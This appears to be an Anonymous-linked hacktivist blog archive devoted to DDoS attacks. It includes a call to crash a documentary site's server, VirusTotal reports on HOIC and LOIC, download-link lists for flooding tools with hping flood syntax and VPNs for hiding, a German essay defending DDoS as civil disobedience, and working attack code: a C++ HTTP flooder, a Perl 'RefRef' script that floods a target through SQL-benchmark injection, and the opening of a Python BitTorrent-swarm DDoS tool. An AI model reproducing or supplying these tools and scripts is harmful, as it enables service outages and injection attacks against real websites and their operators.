Showing posts with label DDos. Show all posts
Showing posts with label DDos. Show all posts

Thursday, October 24, 2013

Wikileaks @Facebook: The server for our new Web Doc is struggling with the traffic. Help us make it crash!! http://guerrillapictures.tv/TheEngineer/

****UPDATE****
TANGO DOWN

****UPDATE****
 "temporarily unavailable"

Tuesday, May 14, 2013

HOIC INFORMATION

Virus Total:
SHA256: 3c9806f8e132917ef85512505fadaca733e5523c271dd2e2a6925ddb9c3d0df0
SHA1: 0b419c8b9f60cb9cb8957a6dbccb393b5d072e43
MD5: 451c94a23536dcbba422d7612b34b6ff
File size: 8.5 MB ( 8902228 bytes )
File name: hoic2.1.exe
File type: Win32 EXE
Tags: peexe mz
Detection ratio: 25 / 46
Analysis date: 2013-05-14 14:47:05 UTC

Ikarus: not-a-virus.Hacktool.HOIC
K7AntiVirus: Hacktool 
VBA32: Hacktool.DDoSer.2321
McAfee: -
AV: -
"not-a-virus.Hacktool.HOIC"

Additional Information:

ssdeep
49152:XKgsEyTPOoMjJWPDYtoAoB81BE7nNeHhkD9d5VGokmPh2U69mNGkpETUPSGvVuWs:TsEaQWrYtlKheZmq9ANP61tmf
TrID
InstallShield setup (29.4%)
Win32 EXE PECompact compressed (generic) (28.4%)
Win32 Executable MS Visual C++ (generic) (21.3%)
Windows Screen Saver (8.9%)
Win32 Dynamic Link Library (generic) (4.5%)
ExifTool
SubsystemVersion.........: 4.0
LinkerVersion............: 8.0
ImageVersion.............: 0.0
FileSubtype..............: 0
FileVersionNumber........: 1.0.0.0
UninitializedDataSize....: 0
LanguageCode.............: English (U.S.)
FileFlagsMask............: 0x003f
CharacterSet.............: Unicode
InitializedDataSize......: 679936
FileOS...................: Win32
Country..................: 
MIMEType.................: application/octet-stream
LegalCopyright...........: 
FileVersion..............: 1.0.0.0
TimeStamp................: 2008:02:06 17:58:42+00:00
FileType.................: Win32 EXE
PEType...................: PE32
InternalName.............: 
FileAccessDate...........: 2013:05:14 15:46:59+01:00
ProductVersion...........: 
FileDescription..........: 
Release..................: Development
OSVersion................: 4.0
FileCreateDate...........: 2013:05:14 15:46:59+01:00
OriginalFilename.........: hoic.exe
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............: 
CodeSize.................: 1474560
ProductName..............: 
ProductVersionNumber.....: 1.0.0.0
EntryPoint...............: 0x15582f
ObjectFileType...........: Executable application
Portable Executable structural information
Compilation timedatestamp.....: 2008-02-06 17:58:42
Target machine................: Intel 386 or later processors and compatible processors
Entry point address...........: 0x0015582F

PE Sections...................:

Name        Virtual Address  Virtual Size  Raw Size  Entropy  MD5
.text                  4096       1472181   1474560     6.63  3ed7acfe70b41f6553a6ab207dc3b595
.rdata              1478656        216654    217088     6.10  cbf161d8a00f96c4e1b9e3ed8d194750
.data               1695744        430624    278528     2.09  cd66d1511bb815a3b68d4e63fc5a7c9d
.rsrc               2129920         27256     28672     4.30  f0ec48234dc728252789002f974c8652

PE Imports....................:

[[COMDLG32.dll]]
PrintDlgA, ChooseColorA, GetSaveFileNameW, PageSetupDlgA, GetOpenFileNameW

[[VERSION.dll]]
VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW

[[WINMM.dll]]
mciSendStringA, midiOutShortMsg, mciSendStringW, midiOutOpen, midiOutClose

[[GDI32.dll]]
GetEnhMetaFileA, GetTextMetricsW, SetMapMode, GetSystemPaletteEntries, Polygon, CreateDIBSection, CreatePen, CreateFontIndirectA, GetTextMetricsA, CombineRgn, SetStretchBltMode, DeleteEnhMetaFile, GetPixel, Rectangle, CreateMetaFileW, GetObjectA, ExcludeClipRect, TranslateCharsetInfo, LineTo, DeleteDC, SetDIBitsToDevice, StretchBlt, EndDoc, GetMetaFileA, SelectObject, StartPage, DeleteObject, CreateBitmap, CloseMetaFile, GetFontLanguageInfo, CreateCompatibleBitmap, RealizePalette, SetTextColor, CreatePatternBrush, GetDeviceCaps, CreateEnhMetaFileW, BitBlt, SetAbortProc, CreateDCA, EnumFontsW, CreateICA, MoveToEx, CreatePalette, EnumFontFamiliesExW, CreateDIBitmap, SetViewportOrgEx, SelectPalette, GetDIBits, SetTextAlign, SelectClipRgn, RoundRect, CreateFontW, SetBkMode, StretchDIBits, CloseEnhMetaFile, SetBrushOrgEx, EndPage, CreateRectRgn, GetClipRgn, StartDocA, DeleteMetaFile, EnumEnhMetaFile, GetEnhMetaFileHeader, CreateBrushIndirect, CreateSolidBrush, SetViewportExtEx, GetStockObject, SetPixelV, SetWindowExtEx, GetTextExtentPoint32W, Ellipse, CreateCompatibleDC

[[SHELL32.dll]]
DragQueryFileW, SHBrowseForFolderW, DragAcceptFiles, SHFileOperationW, ShellExecuteW, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHGetDesktopFolder, Shell_NotifyIconW, SHGetMalloc, DragFinish

[[KERNEL32.dll]]
GetStdHandle, GetConsoleOutputCP, FileTimeToSystemTime, GetOverlappedResult, WaitForSingleObject, HeapDestroy, GetFileAttributesW, GetLocalTime, FreeEnvironmentStringsA, DeleteCriticalSection, GetCurrentProcess, CompareFileTime, GetConsoleMode, GetLocaleInfoA, _llseek, GetLogicalDrives, FreeEnvironmentStringsW, SetCommTimeouts, GetLocaleInfoW, SetStdHandle, GetCommModemStatus, IsDBCSLeadByteEx, WideCharToMultiByte, GetStringTypeA, WriteFile, _lopen, GetSystemTimeAsFileTime, HeapReAlloc, GetStringTypeW, FreeLibrary, GetTimeZoneInformation, LoadResource, GetLogicalDriveStringsW, FindClose, TlsGetValue, MoveFileW, SetFileAttributesW, GetStringTypeExA, GetEnvironmentVariableW, SetLastError, GetSystemTime, InitializeCriticalSection, CopyFileW, GetUserDefaultLangID, OutputDebugStringW, RemoveDirectoryW, IsDebuggerPresent, HeapAlloc, GetVersionExA, GetModuleFileNameA, QueryPerformanceFrequency, GetUserDefaultLCID, SetHandleCount, UnhandledExceptionFilter, InterlockedDecrement, MultiByteToWideChar, SetFilePointer, _lclose, SetEnvironmentVariableW, GetSystemDirectoryW, SetUnhandledExceptionFilter, MulDiv, ClearCommError, GetSystemDirectoryA, TerminateProcess, WriteConsoleA, SetCurrentDirectoryW, GetCommState, LocalFileTimeToFileTime, SetEndOfFile, GetCurrentThreadId, LeaveCriticalSection, WriteConsoleW, HeapFree, EnterCriticalSection, SetCommBreak, LoadLibraryW, GetOEMCP, QueryPerformanceCounter, GetTickCount, TlsAlloc, VirtualProtect, FlushFileBuffers, LoadLibraryA, RtlUnwind, GlobalSize, GetStartupInfoA, GetDateFormatA, GetWindowsDirectoryW, GetFileSize, GetModuleHandleW, GetCommProperties, CreateDirectoryW, DeleteFileW, GlobalLock, _lread, GetProcessHeap, GetTempFileNameW, CompareStringW, GlobalReAlloc, GetModuleFileNameW, ExpandEnvironmentStringsW, FindNextFileW, GlobalFree, lstrcpyA, ResetEvent, FindFirstFileW, GetProcAddress, EscapeCommFunction, CreateEventW, SetCommState, CreateFileW, CreateEventA, GetFileType, TlsSetValue, CreateFileA, ExitProcess, InterlockedIncrement, GetLastError, SystemTimeToFileTime, LCMapStringW, GetShortPathNameW, GetFileTime, GetConsoleCP, LCMapStringA, GetEnvironmentStringsW, GlobalUnlock, GlobalAlloc, FileTimeToLocalFileTime, GetEnvironmentStrings, GetCurrentDirectoryW, GetCurrentProcessId, LockResource, SetFileTime, GetCommandLineW, GetCPInfo, ClearCommBreak, HeapSize, GetCommandLineA, GetCurrentThread, RaiseException, CompareStringA, TlsFree, GetModuleHandleA, ReadFile, CloseHandle, GetACP, GetVersion, GetLongPathNameW, IsValidCodePage, HeapCreate, GetTempPathW, VirtualFree, Sleep, IsBadReadPtr, FindResourceA, VirtualAlloc, GetTimeFormatA

[[OLEAUT32.dll]]
Ord(419), Ord(424), Ord(6), Ord(2)

[[IPHLPAPI.DLL]]
GetAdaptersInfo

[[ADVAPI32.dll]]
RegCreateKeyExW, RegCloseKey, AccessCheck, RegDeleteKeyW, RegQueryValueExW, GetFileSecurityW, RegisterEventSourceW, DeregisterEventSource, RegOpenKeyExW, ImpersonateSelf, SetServiceStatus, RegQueryInfoKeyW, RegDeleteValueW, RegEnumKeyExW, OpenThreadToken, RegisterServiceCtrlHandlerA, MapGenericMask, RegEnumValueW, RevertToSelf, StartServiceCtrlDispatcherA, RegSetValueExW, ReportEventW

[[ole32.dll]]
OleUninitialize, CoUninitialize, CoInitialize, OleInitialize, CoCreateInstance, CLSIDFromString, RegisterDragDrop, CLSIDFromProgID, DoDragDrop, RevokeDragDrop, CoTaskMemAlloc, CoTaskMemFree, CoGetClassObject

[[USER32.dll]]
RedrawWindow, GetMessagePos, CharLowerBuffA, DestroyMenu, GetForegroundWindow, SetWindowPos, DispatchMessageA, EndPaint, VkKeyScanA, CharUpperBuffA, WindowFromPoint, DrawIcon, GetMessageTime, SetMenuItemInfoW, DispatchMessageW, GetCursorPos, ChildWindowFromPointEx, GetMenuStringW, GetMenu, IsClipboardFormatAvailable, SendMessageA, GetClassInfoW, DefMDIChildProcW, DrawTextW, SetScrollPos, GetWindowTextLengthA, GetSysColor, ClientToScreen, GetActiveWindow, ShowCursor, GetWindowTextW, LoadImageA, GetTopWindow, InvalidateRgn, GetMenuItemID, DestroyWindow, DrawEdge, GetParent, UpdateWindow, SetPropA, EnumWindows, GetMenuState, GetMessageW, ShowWindow, GetPropA, EnumDisplayMonitors, PeekMessageW, TranslateMDISysAccel, EnableWindow, PeekMessageA, TranslateMessage, GetAsyncKeyState, GetWindow, RegisterClassW, CreateCursor, GetIconInfo, SetParent, SetClipboardData, ScrollWindow, IsZoomed, SetWindowLongW, DrawMenuBar, EnableMenuItem, InvertRect, WindowFromDC, GetWindowLongA, CreateWindowExA, FillRect, CopyRect, GetSysColorBrush, CreateWindowExW, CreateMenu, GetMenuItemInfoW, DragDetect, SetFocus, MapVirtualKeyA, PostMessageA, BeginPaint, OffsetRect, DefWindowProcW, GetScrollPos, KillTimer, GetMonitorInfoA, RegisterWindowMessageA, DefWindowProcA, DrawFocusRect, GetClipboardData, GetSystemMetrics, IsIconic, SetScrollRange, GetWindowRect, InflateRect, RegisterClassA, SetCapture, ReleaseCapture, EnumChildWindows, SetWindowLongA, InvalidateRect, RemovePropA, CreatePopupMenu, CheckMenuItem, GetSubMenu, DrawIconEx, SetWindowTextW, SetTimer, BringWindowToTop, FindWindowW, ScreenToClient, LoadCursorA, LoadIconA, TrackPopupMenu, GetMenuItemCount, CreateIconFromResourceEx, CreateIconFromResource, GetSystemMenu, GetDC, InsertMenuW, SetForegroundWindow, OpenClipboard, EmptyClipboard, ReleaseDC, GetScrollRange, GetScrollInfo, CreateIconIndirect, MessageBeep, MessageBoxW, SendMessageW, DrawFrameControl, SetMenu, RegisterClipboardFormatA, MoveWindow, MessageBoxA, GetWindowDC, DestroyCursor, LoadCursorFromFileW, MsgWaitForMultipleObjectsEx, SetScrollInfo, GetKeyState, SystemParametersInfoA, GetDoubleClickTime, DestroyIcon, CreateMDIWindowW, GetWindowLongW, DefFrameProcW, IsWindowVisible, FrameRect, SetRect, DeleteMenu, GetKeyNameTextW, wsprintfA, CallWindowProcW, AdjustWindowRect, GetClientRect, ValidateRect, GetClassNameA, GetFocus, CloseClipboard, SetCursor

[[COMCTL32.dll]]
ImageList_Create, Ord(17), InitCommonControlsEx, ImageList_Destroy, ImageList_Add

PE Resources..................:

Resource type            Number of resources
RT_ICON                  6
RT_GROUP_CURSOR          3
RT_CURSOR                3
RT_MANIFEST              1
PICKLE                   1
RT_VERSION               1
RT_GROUP_ICON            1

Resource language        Number of resources
ENGLISH US               16
ClamAV PUA Engine
Possibly Unwanted Application. While not necessarily malicious, the scanned file presents certain characteristics which depending on the user policies and environment may or may not represent a threat. For full details see: http://www.clamav.net/index.php?s=pua&lang=en .
First seen by VirusTotal
2010-12-10 07:32:17 UTC ( 2 years, 5 months ago )
Last seen by VirusTotal
2013-05-14 14:47:05 UTC ( 2 minutes ago )
File names (max. 25)
  1. hoic2.exe
  2. HOIC.exe
  3. 451c94a23536dcbba422d7612b34b6ff
  4. 1598819
  5. HOIC2.1.exe
  6. output.1598819.txt
  7. hoic2.1.exe
  8. "hoic2.1.exe"
  9. hoic2.1.exe
  10. smona_3c9806f8e132917ef85512505fadaca733e5523c271dd2e2a6925ddb9c3d0df0.bin
  11. hoic2.1.ex
 

DDOS TOOL LIST FROM ANONYMOUS 2.0



LOIC
Download: http://adf.ly/TWxyq
Info: http://xenonymous.blogspot.de/2013/05/loic-information.html

HOIC
Download: http://adf.ly/TWy8E *coming soon*
 Info: http://xenonymous.blogspot.de/2013/05/hoic-information.html
Another Links:
Not Official

HOIC-Download  
http://adf.ly/TWyD3

Pentbox
Download: http://adf.ly/TWyHf

Slowloris
Usage & DL Mirrors: http://adf.ly/TWyMM
Download links here http://adf.ly/TWyTq


r-u-dead-yet?
Download : http://adf.ly/TWyYh


hping2
Download: http://adf.ly/TWydm
hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
4 moar options take a look @ http://pastebin.com/uM1MjN4b



for advanced users:
http://www.thc.org/thc-ssl-dos/

Visit me on Facebook:https://www.facebook.com/pages/Anonymous-Blog-by-Xenonymous/395615810514296



Old:

DDoS Tool List From Anonymous

DDOS TOOLS LIST!
DDoSim (Linux) - Download => http://adf.ly/TWymG
Loris - Download => http://adf.ly/TWytV
  => http://www.hping.org/download.php | Instructions =>
Tor's Hammer => http://adf.ly/TWyzi

LOIC: http://adf.ly/TWz5x

 Visit me on Facebook:https://www.facebook.com/pages/Anonymous-Blog-by-Xenonymous/395615810514296


Sunday, May 12, 2013

LOIC INFORMATION

SourceForge:
Low Orbit Ion Cannon.

The project just keeps and maintenances (bug fixing) the code written by the original author - Praetox, but is not associated or related with it.

DISCLAIMER: USE ON YOUR OWN RISK. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER OR CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.

RESULT: HackTool.MSIL.Loic.de (Not a Virus)


Virus Total:
SHA256: 1b26fcf0da549a47dceefb4e99fd520d63dec3a7cd539d3edcf1d7c1d4a95fd5
SHA1: 26ef60c870017ebc85901fb2fbce740b82032eb1
MD5: b596e7cacbad1e814b0cd053086c4900
File size: 132.0 KB ( 135168 bytes )
File name: LOIC.exe
File type: Win32 EXE
Tags: peexe assembly mz
Detection ratio: 36 / 46
Analysis date: 2013-05-12 16:34:34 UTC





ssdeep
1536:g9hnd0LAv8k8h/OseMoZKAGRANEiNn8tW6zon4vW48N4Q+X/TsLLbyXPnDlzuZe0:KiLnkqtBoZ9B8ccW48kLcpZi4Vdf
TrID
Generic CIL Executable (.NET, Mono, etc.) (81.0%)
Win32 Dynamic Link Library (generic) (7.2%)
Win32 Executable (generic) (7.2%)
Generic Win/DOS Executable (2.2%)
DOS Executable Generic (2.2%)
ExifTool
FileDescription..........: Low Orbit Ion Cannon
Comments.................: TCP/IP stress-test tool
LinkerVersion............: 8.0
ImageVersion.............: 0.0
ProductName..............: Low Orbit Ion Cannon
FileVersionNumber........: 1.0.7.0
LanguageCode.............: Neutral
FileFlagsMask............: 0x003f
CharacterSet.............: Unicode
InitializedDataSize......: 19968
OriginalFilename.........: LOIC.exe
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............: 1.0.7.0
TimeStamp................: 2012:01:29 10:04:31+00:00
FileType.................: Win32 EXE
PEType...................: PE32
InternalName.............: LOIC.exe
SubsystemVersion.........: 4.0
FileAccessDate...........: 2013:05:12 17:34:13+01:00
ProductVersion...........: 1.0.7.0
UninitializedDataSize....: 0
OSVersion................: 4.0
FileCreateDate...........: 2013:05:12 17:34:13+01:00
FileOS...................: Win32
LegalCopyright...........: Public domain
MachineType..............: Intel 386 or later, and compatibles
CodeSize.................: 114688
FileSubtype..............: 0
ProductVersionNumber.....: 1.0.7.0
EntryPoint...............: 0x1de7e
ObjectFileType...........: Executable application
AssemblyVersion..........: 1.0.7.0
Sigcheck
product..................: Low Orbit Ion Cannon
description..............: Low Orbit Ion Cannon
file version.............: 1.0.7.0
original name............: LOIC.exe
strong name..............: Signed
comments.................: TCP/IP stress-test tool
version..................: 1.0.7.0
internal name............: LOIC.exe
copyright................: Public domain
link date................: 11:04 AM 1/29/2012
Portable Executable structural information
Compilation timedatestamp.....: 2012-01-29 10:04:31
Target machine................: Intel 386 or later processors and compatible processors
Entry point address...........: 0x0001DE7E

PE Sections...................:

Name        Virtual Address  Virtual Size  Raw Size  Entropy  MD5
.text                  8192        114308    114688     7.59  0d080ec0ea8cc25e0170d587dd63ac47
.rsrc                122880         19264     19456     6.52  f21a95feec6e9209f5fc1cbccc1ed6f6
.reloc               147456            12       512     0.10  825a5e453d530acd3dbd4031046c9db5

PE Imports....................:

[[mscoree.dll]]
_CorExeMain

PE Resources..................:

Resource type            Number of resources
RT_ICON                  4
RT_GROUP_ICON            1
RT_VERSION               1
RT_MANIFEST              1

Resource language        Number of resources
NEUTRAL                  7
ClamAV PUA Engine
Possibly Unwanted Application. While not necessarily malicious, the scanned file presents certain characteristics which depending on the user policies and environment may or may not represent a threat. For full details see: http://www.clamav.net/index.php?s=pua&lang=en .
First seen by VirusTotal
2012-01-29 16:25:46 UTC ( 1 year, 3 months ago )
Last seen by VirusTotal
2013-05-12 16:34:34 UTC ( 6 minutes ago )
File names (max. 25)
  1. HOIC.exe
  2. Extreme%20Ddoser%20v2.122%20loic.exe
  3. LOIC.exe
  4. LOIC.exe_
  5. b596e7cacbad1e814b0cd053086c4900
  6. LOIC-1.exe
  7. LOIC1.0.7.42.exe
  8. LOIC 2.exe
  9. LOIC (2).exe
  10. 077
  11. LOIC.exe
  12. HackTool.exe
  13. Low Orbit Ion Cannon.exe
  14. LOWORBITIONCANNON.exe
  15. LOIC 1.0.7.42.exe
  16. Low Orbbit Ion Cannon.exe
  17. LOIC.exe
  18. 4.LOIC ПРОГРАММА.exe
  19. 1B26FCF0DA549A47DCEEFB4E99FD520D63DEC3A7CD539D3EDCF1D7C1D4A95FD5.exe
  20. LOIC (2012_11_02 16_22_21 UTC).exe
  21. 26EF60C870017EBC85901FB2FBCE740B82032EB1
  22. LOIC1.exe
  23. sospechoso.txt
  24. LOIC.EXE
  25. ('LOIC', '.exe')

    RESULT: HackTool.MSIL.Loic.de (Not a Virus)

    What is PUA : http://www.clamav.net/index.php?s=pua&lang=en

Tuesday, December 11, 2012

Anonymous erklärt Ddos (GERMAN)

n Deutschland wird die Beteiligung an Distributed-Denial-of-Service-Attacken als „Computersabotage" gewertet und nach § 303b Abs. 1 StGB mit bis zu drei Jahren Freiheitsstrafe oder mit Geldstrafe geahndet.


Prinzipiell lässt sich eine DDoS-Attacke jedoch treffender mit einer Sitzblockade vergleichen. Daher sollte man sie auch dementsprechend beurteilen. Ketten sich Umweltaktivisten an Gleise, so muss der CASTOR-Transport gestoppt werden. Technisch gesehen trifft dies auch auf DDoS-Attacken zu, da man gezielt mit sinnlosen Anfragen die Server überlastet und somit deren Transport von Informationen stoppt. Diese Attacken richten keinen physischen Schaden an, sondern sollen lediglich den Betrieb der Webpräsenzen für den Zeitraum der DDos-Attacke einschränken.


Sitzblockaden kann man mit Hilfe der Polizei auflösen, auch wenn diese etwas Zeit dafür benötigt. Ähnlich kann man auch DDoS-Attacken mit Hilfe von Aktualisierungen bzw. Neuinstallation von entsprechenden PlugIn's oder der Optimierung der Firewall- und Servereinstellungen auflösen.


Desweiteren ist zu berücksichtigen, dass ein Demonstrant, der sich an einer Sitzblockade beteiligt, nicht danach gefragt wird wodurch sein Handeln legitimiert wird, obwohl sein Verhalten den Tatbestand der Nötigung entspricht. Wir sehen darin einen eklatanten Widerspruch.
Anonymous möchte mit diesen virtuellen Sitzblockaden seinen zivilen Widerstand gegen bestimmte Konzerne, Großunternehmen oder Teile der Regierung zum Ausdruck bringen.


Ziel waren, sind und werden nie Unbeteiligte sein. Sei es in Form eines direkten Angriffes oder durch Folgen, die dadurch entstehen.


Vergangene Angriffe, wie zum Beispiel auf das PlayStation Network haben lediglich deren Webpräsenz geschadet. Die entwendeten Userdaten wurden von anderen Gruppen, welche unter Mitwissen von Sony schon über einen Monat sich an deren Datenbank versucht haben, ergattert. Sony hat nichts dagegen unternommen. Medien haben daraufhin fälschlicherweise Anonymous als Sündenbock dargestellt. Ähnlich, wie bei Servergate, als man versuchte Anonymous als terroristische Organisation darzustellen, welche gezielt Atomkraftwerke übernehmen wollte - was nebenbei erwähnt mit einfachen DDoS auf deren Webpräsenz unmöglich ist. Leider geben diese Medien stark verfälschte Inhalte wieder. Derartige Reaktionen entstehen aus mangelnder Sachkompetenz der Redakteure oder - wahrscheinlich - mit der Intention der Auflagensteigerung durch Verunsicherung und Angstschürung durch Desinformation.


Wieso diese harten Strafen? Wir fordern DDoS-Attacken als virtuelle Sitzblockade im Sinne des zivilen Ungehorsams anzuerkennen und angemessenere Reaktionen folgen zu lassen.

Wednesday, November 28, 2012

[C++][Source] Scl-DDoS (Simple CLI DDoSer) [Well-Commented code!][Windows]

#######################http://pastebin.com/zHd0YqRL#####################
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <signal.h>

#define MAXRETRIES 3//Set max retries
#define BUFFSIZE 256//Set buffer size

//http header
const char * szHeader =
    "GET / HTTP/1.1\r\n"
    "Accept: text/html\r\n"
    "Accept-Language: *\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept-Encoding:\r\n"
    "Connection: Keep-Alive\r\n"
    "Host: "; //Hostname/ip is appended later

void terminate(int nParam) //Terminate function
    {
    printf("Cleaning up...\n");
    WSACleanup(); //Cleanup
    printf("Finished!\n");
    exit(0); //Exit the program
    }

void usage() //Displays usage
    {
    printf("Usage: [IP/HOSTNAME] [PORT] [MAX-TIMEOUT]\n"
      "Arg 1 must be a valid IPv4-address or hostname! (ex. 192.168.0.100 / www.google.com)\n"
      "PORT must be a valid positive integer! (ex. 80)\n"
      "MAX-TIMEOUT(timeout defined in msec) must be a valid positive integer!\n");
    return;
    }

int main(int argc,char *argv[]) //Main function
    {
    //**
    // Check arguments  *
    //**
    if (argc != 4) //Check to see if there are 3 arguments...
        {
        usage(); //If not, then display usage,
        exit(1);//then exit...
        }

    //Check if both argument 2 and 3 is valid positive integers
    if (!(atoi(argv[2])>0)||!(atoi(argv[3])>0))
        {
        usage();//If not, then display usage,
        exit(1);//then exit...
        }
    //**

    //**
    // Initialize    *
    //**
    void (*termsign)(int); //Termination signal handle

    termsign = signal (SIGINT,terminate); //Set-up signal from SIGNINT(Interrupt) to terminate
    if (termsign == SIG_ERR) //If signal set-up failed, then quit...
        {
        printf("Cannot set-up signals!\nQuitting...\n");
        exit(1);//Exit...
        }

    WSADATA wsaData; //Instance of wsaData
    int nRes = WSAStartup(MAKEWORD(2,2), &wsaData); //Check version and start winsock2

    if (nRes != NO_ERROR) //Check if winsock had any errors...
        {
        printf("WSAStartup failed!\n");
        exit(1); //Exit
        }
    //**

    //**
    // Get/set host IP  *
    //**
    sockaddr_in cAddress; //Create instance sockaddr_in to define target host address

    printf("Challenging as IP...\n");
    cAddress.sin_addr.s_addr = inet_addr(argv[1]); //Set ip, if arg 1 is IP
    if (cAddress.sin_addr.s_addr!=-1) //If IP != -1
        printf("Using IP %s\n",inet_ntoa(cAddress.sin_addr)); //Use IP
    else
        {
        printf("Challenging as hostname...\n");
        hostent* addr = gethostbyname(argv[1]); //Resolve hostname of url

        if (addr!=NULL)        //If hostname is resolvable
            cAddress.sin_addr = (*(in_addr *)*addr->h_addr_list); //Then get the first IP of url
        else
            {
            printf("Couldn't resolve hostname!\n");
            exit(0); //Exit...
            }
        }
    printf("Using IP from hostname: %s\n",inet_ntoa(cAddress.sin_addr));

    cAddress.sin_family = AF_INET; //Set address type
    cAddress.sin_port = htons(atoi(argv[2])); //Set address
    //**

    //**
    // Create HTTP Packet  *
    //**
    int nBytesOut = NULL; //Holds number of bytes sent
    int nBytesIn = NULL;  //Holds number of bytes recieved

    char szBufferOut[BUFFSIZE]; //Out buffer
    char szBufferIn[BUFFSIZE];  //In buffer

    for(int i=0;i<BUFFSIZE;szBufferOut[i++]='\0'); //Zero memory for szBufferOut
    for(int i=0;i<BUFFSIZE;szBufferIn[i++]='\0'); //Zero memory for szBufferIn

    for(int i=0;szHeader[i]!='\0';szBufferOut[i]=szHeader[i],i++); //Copy header to outBuffer

    nBytesOut = (int)strlen(szBufferOut); //Get length of out-buffer so far
    for(int i=0;argv[1][i]!='\0';szBufferOut[nBytesOut+i]=argv[1][i],i++); //Add host address to header

    char szEndToken[4] = {'\r','\n','\r','\n'}; //End-token (CR,LF,CR,LF)

    nBytesOut = (int)strlen(szBufferOut); //Get length of out-buffer so far, again
    for(int i=0;i<(int)strlen(szEndToken);szBufferOut[nBytesOut+i]=szEndToken[i],i++); //Add CR LF CR LF

    printf("Out packet:\n\n%s\n\n",szBufferOut);
    //**

    //**
    // Main loop  *
    //**
    while(1)  //Loop until interrupted
        {
        SOCKET cSocket; //Declare instance of SOCKET
        cSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); //Set-up socket

        if (cSocket == INVALID_SOCKET)  //Check if socket was created successfully
            {
            printf("Socket creation failed! Error#:%d\n", WSAGetLastError());
            terminate(0); //Clean up, and quit...
            }

        //Try to connect to server...
        if (connect(cSocket,(SOCKADDR*)&cAddress,sizeof(cAddress)) == SOCKET_ERROR)
            {
            printf("Connection failed!\n");
            Sleep(atoi(argv[3]));
            continue; //Try again...
            }

        (void)send(cSocket, szBufferOut, strlen(szBufferOut), 0); //Send packet

        nBytesIn = NULL;

        while(nBytesIn == 0)  //Wait for response
            {
            nBytesIn = recv(cSocket, szBufferIn, BUFFSIZE-1, 0); //Get reply, if any...

            //If response is empty, or connection times out, then try again...
            if (nBytesIn <= 0 || nBytesIn == WSAECONNRESET)
                {
                printf("Host unavailable!\n");
                Sleep(atoi(argv[3]));
                nBytesIn = -1; //Will trigger loop restart *
                break;
                }

            if (nBytesIn <= 0) //Check if pack has a size > than 0
                {
                nBytesIn = -1; //Will trigger loop restart *
                break;
                }

            //See if reply is valid
            char szValidReply[12] = {'H','T','T','P','/','1','.','1',' ','2','0','0'};
            int ok = 0;

            for(int i=0;i<12;i++) //Compare chars...
                if (szValidReply[i]!=szBufferIn[i])
                {
                    ok = 1; //This is triggered if char's are different!
                    break;
                }
            if (ok!=0) //Check to see if they compared alright...
                {
                printf("Invalid reply!\nReply:\n--\n\n%s\n",szBufferIn);
                terminate(0);
                }
            }

        if (nBytesIn == -1) //If nBytesIn is set to -1,
            continue; //then retry connection... *

        printf("Reply[0-256]: \n\n%s\n\n\n",szBufferIn);

        for(int i=0;i<BUFFSIZE;szBufferIn[i++]='\0'); //Zero memory for szBufferIn
        closesocket(cSocket);    //Close socket
        Sleep(atoi(argv[3]));
        }
    //**

    terminate(0);
    }

Tuesday, November 13, 2012

#REFREF

    #!usr/bin/perl
    #RefRef
    #@by_Xenonymous
    use LWP::UserAgent;
    my $nave = LWP::UserAgent->new;
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $nave->timeout(5);
    head();
    if($ARGV[0]) {
    now($ARGV[0]);
    } else {
    sintax();
    }
    copyright();
    sub now {
    print "\n[+] Target : ".$_[0]."\n";
    print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
    while(true) {
    $SIG{INT} = \&adios;
    $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70 726f62616e646f70726f62616e646f))");
    unless($code->is_success) {
    print "[+] Web Off\n";
    copyright();
    }}}
    sub adios {
    print "\n[+] Stoping attack\n";
    copyright();
    }
    sub head {
    print "\n\n-- == #RefRef == --\n\n";
    }
    sub copyright {
    print "\n\n-- == RefRef == --\n\n";
    exit(1);
    }
    sub sintax {
    print "\n[+] Sintax : $0 \n";
    }
    sub toma {
    return $nave->get($_[0]);
    }
      
    # ¿ The End ?

#REF REF

http://pastebin.com/Ae3emcep

ANONYMOUS: Message to pedophiles

DOS V3.2 http://www.mediafire.com/?pxv4pbxjg3a2vqa
Loic http://www.mediafire.com/?4exm4kghdcz316u
Hoic V2.1 http://www.mediafire.com/?ddp9d5znwmgsasr
Turbinas V1.0 http://www.mediafire.com/?wo4sh527nf7wais
Slowloris http://www.mediafire.com/?6wbee516qfx6zok
SYN Flood DOS http://www.mediafire.com/?ja4x2odlxn7xcq3
TUNEL:http://www.securitykiss.com/resources/download/windows/
HOTSPOT SHIELD: http://hotspot-shield.softonic.com/
ULTRA VPN: http://ultravpn.softonic.com/
CYBERGHOST: http://cyberghost-classic-vpn.softonic.com/
Tunnelbear 1.0: http://tunnelbear.softonic.com/

http://pastebin.com/bhMsSt3R

Sunday, November 4, 2012

SwarmDos.py

    #!/usr/bin/env python2.7
    #
    # bitDDoS.py
    #
    # Bittorrent Swarm ``DDoS Tool''
    # Injects target machine into large bittorent swarms
    #
    # no fucking idea if this works or not
    #
    from urllib import urlencode, unquote
    from urlparse import parse_qs
    import random, time, socket, threading, traceback, binascii, copy
     
    import requests # http://pypi.python.org/pypi/requests/0.14.1
    import hunnyb # http://pypi.python.org/pypi/HunnyB/0.1.0
    from bs4 import BeautifulSoup as BS # http://pypi.python.org/pypi/beautifulsoup4/4.1.3  
     
     
